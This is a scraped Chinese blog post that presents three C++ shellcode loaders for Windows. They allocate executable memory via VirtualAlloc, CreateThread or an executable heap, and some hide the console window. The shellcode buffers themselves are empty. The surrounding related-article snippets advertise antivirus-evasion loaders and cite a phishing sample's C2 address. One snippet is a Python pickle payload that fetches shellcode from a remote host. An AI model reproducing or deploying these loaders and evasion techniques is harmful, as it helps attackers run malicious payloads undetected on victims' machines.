c++之shellcode加载器

已于 2022-05-28 12:21:45 修改
阅读量3.6k 收藏 5
点赞数 1
分类专栏: 二进制逆向 文章标签: c++ c语言 开发语言
于 2022-05-26 20:30:18 首次发布
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/124991965
版权

文章目录

VirtualAlloc申请内存

#include <windows.h>
#include <iostream>
#include <time.h>
#pragma comment (lib, "winmm.lib")

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
void startShellCode()
{
 unsigned char buf[] = "";

 void* exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 memcpy(exec, buf, sizeof(buf));
 ((void(*)())exec)();
}

void main() {
 startShellCode();
}

#include<windows.h>

int main()
{
	int shellcode_size = 0;
	DWORD dwThreadId;
	HANDLE hThread;
	DWORD dw01dRrotect;

	unsigned char buf[] = "";
	shellcode_size = sizeof(buf);

	LPVOID shellcode = VirtualAlloc(
		NULL,
		shellcode_size,
		MEM_COMMIT,
		PAGE_EXECUTE_READWRITE
	);

	//将shellcode复制到可读可写的内存中
	CopyMemory(shellcode, buf, shellcode_size);

	hThread = CreateThread(
		NULL,	//安全描述符
		NULL,	//栈的大小
		(LPTHREAD_START_ROUTINE)shellcode,//函数
		NULL,	//参数
		NULL,	//线程标志
		&dwThreadId
	);

	WaitForSingleObject(hThread, INFINITE);	//一直等待线程结束
}


#include<Windows.h>
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//隐藏dos黑窗口

int main(void) {
	unsigned char buf[] = "shellcode";

	//创建一个堆
	HANDLE myHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	//从堆上分配一块内存
	void* exec = HeapAlloc(myHeap, HEAP_ZERO_MEMORY, sizeof(buf));
	memcpy(exec, buf, sizeof(buf));

	((void(*)())exec)();
	return 0;
}
天问_Herbert555
关注
专栏目录
C语言实现shellcode通用框架二:文件下载执行或内存加载
yan_star的博客
01-21 1225
简介: 承接接上篇。上篇(C语言实现shellcode通用框架一:解密执行)我们的第二层shellcode核心代码都是事先加密好嵌套在第一层shellcode中,核心代码更新起来不方便。所以联网更新显得尤为重要。大家可以选择内存加载,这样可以避免落地被杀软查杀,也可以选择落地,随意选择,思想和代码很重要。其实,这篇介绍的shellcode框架代码和上篇大同小异,无非是API、动态库多了一些,代码量有所变大,但是核心思想,代码逻辑还是一样的。开下源,希望对大家学习有所帮助。关于内存加载那块我注释并标出了,使
shellcode加载
goat_2003的博客
09-10 1629
编写shellcode不能使用绝对地址,因为当我们加载到其他函数中时绝对地址储存的可能什么也没有,甚至是其他函数,所以当我们需要调用一个函数时,需要动态获取函数的地址实现调用。 想要动态获取函数地址,可以使用以下函数 GetProcAddress 从dll中获取函数的地址 LoadLibraryA 将指定的模块加载到调用进程的地址空间中 举个例子: LPVOID lp = GetProcAddress(LoadLibraryA("user32.dll"),"MessageBoxA"); _asm {
什么是shellcode加载
最新发布
m0_57836225的博客
08-13 163
在安全领域,恶意的 Shellcode 加载常用于网络攻击和恶意软件中,对系统的安全构成威胁。4. 执行控制转移:通过某种方式将程序的执行流程转移到已写入的 Shellcode 所在的内存地址,从而开始执行 Shellcode 中的指令。Shellcode 通常是一段精心编写的机码,用于在目标系统上执行特定的恶意或非恶意操作,比如获取系统权限、执行特定功能等。1. 分配内存:加载首先在目标进程的内存空间中分配一段可执行的内存区域,用于存储即将加载Shellcode
2021 HW红队样本分析(二) C++ ShellcodeLoader
J0o1ey Blog
08-31 234
0x01 样本概况 Name:国家xx局安全升级文档.docs.exe ico为word的,很显然在利用已知扩展名隐藏的特性在钓鱼 在Virustotal网站上,样本报毒9引擎,基本上绕过了全部国产杀毒,免杀效果相对较好 其样本为C2远控样本,回链地址为39.107.95.197 其回连IP已经被标记为恶意C2 IP 行为特征如下 0x02 样本分析 对该样本进行反编译处理,该恶意样本执行流程如下创建互斥体 检查用户名 检查当前环境是否为虚拟机 检查系统语言 从http://39.107.
探索Shellcode_Loader:一款高效、灵活的Shellcode加载
gitblog_00002的博客
04-22 668
探索Shellcode_Loader:一款高效、灵活的Shellcode加载 项目地址:https://gitcode.com/Avienma/shellcode_loader 在安全研究和逆向工程领域,Shellcode是一个关键元素,它是一段可以直接由处理执行的小型机码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是Shellcode_Loader项目的用武之地。本文将带...
免杀之浅谈shellcode加载
qq_46217803的博客
12-26 1824
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存能执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的shellcode,本地生成的,用的是Visual Studio。
NimShellCodeLoader:使用nim编写的shellcode加载
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
C ++完全未检测到的Shellcode启动;)-C/C++开发
05-27
c ++完全未检测到的shellcode启动;)夏洛特c ++完全未检测到的shellcode启动;)发行此版本以庆祝我的新生描述c ++ shellcode的启动的诞生,截至2021年5月13日,完全未检测到0/26。和函数名称在Kali Linux上...
java 加载shellcode_通用Shellcode加载
weixin_35780426的博客
02-26 969
Shellcode加载是一种基本的规避技术。尽管shellcode加载通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。例如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。我们将研究一些适合与加载结合使用的后期开发框架,并研究如何嵌入其他类型的二进制文件(例如.NET和已编译的PE二进制文件)。博客系列的第一部分将介...
C++撰写shellcode.zip
10-06
非常不错的shellcode学习教程,非常完善,分享给大家。仅供学习使用,切不可商业用途,后果自负。
绕过AV:免杀shellcode加载
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
Shellcode编译-C/C++开发
05-26
Shellcode编译Shellcode Compiler是一个程序,可将C / C ++样式代码编译成一个小的,与位置无关且没有NULL的Shellcode,适用于Windows(x86和x64)和Linux(x86和x64)。 可以调用任何Windows AP Shellcode编译Shellcode Compiler是一个程序,可将C / C ++样式代码编译成一个小的,与位置无关且无NULL的Windows(x86和x64)和Linux(x86和x64)外壳代码。 可以通过用户友好的方式调用任何Windows API函数或Linux syscall。 Shellcode编译将源文件作为输入,并使用其自己的编译来解释代码并生成由Keystone引擎组装的组装文件。 命令行选项-h(--help):S
第15节 编写shellcode加载
imbyter师哥的博客
05-14 403
我最近在做一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。我们编写一个最简单的shellcode加载工具,应用于将本地的shellcode文件执行起来。一个人走得再快,不如一群人走得更远!
python编写shellcode_python生成shellcode加载
weixin_39763293的博客
12-19 507
import ctypes, cPickle, base64, urllib2class ptr(object):def __reduce__(self):return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object):def __init...
C/C++ 搜索缝隙并插入ShellCode
CSDN
02-22 7470
ShellCode放入变量中,然后修改插入可执行文件名称,运行后即可将shellCode插入到EXE中,并设置好装载地址,程序运行后会先上线,然后在执行原始的代码,在使用metaspoit生成shellcode时,运行方式需要指定为线程运行,如果为进程运行,则会卡在ShellCode的循环代码中,原始程序则无法弹出,也就起不到插入的目的了。
多种基础Shellcode加载
Liyu_6618的博客
02-02 735
多种编程语言Shellcode的模板
python shellcode加载
09-19
Python shellcode加载是一种用Python编写的程序,用于加载和执行Shellcode(一段机码,通常用于执行系统级操作)的工具。Shellcode加载通常用于渗透测试、恶意软件开发或安全研究等领域。 Python shellcode...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值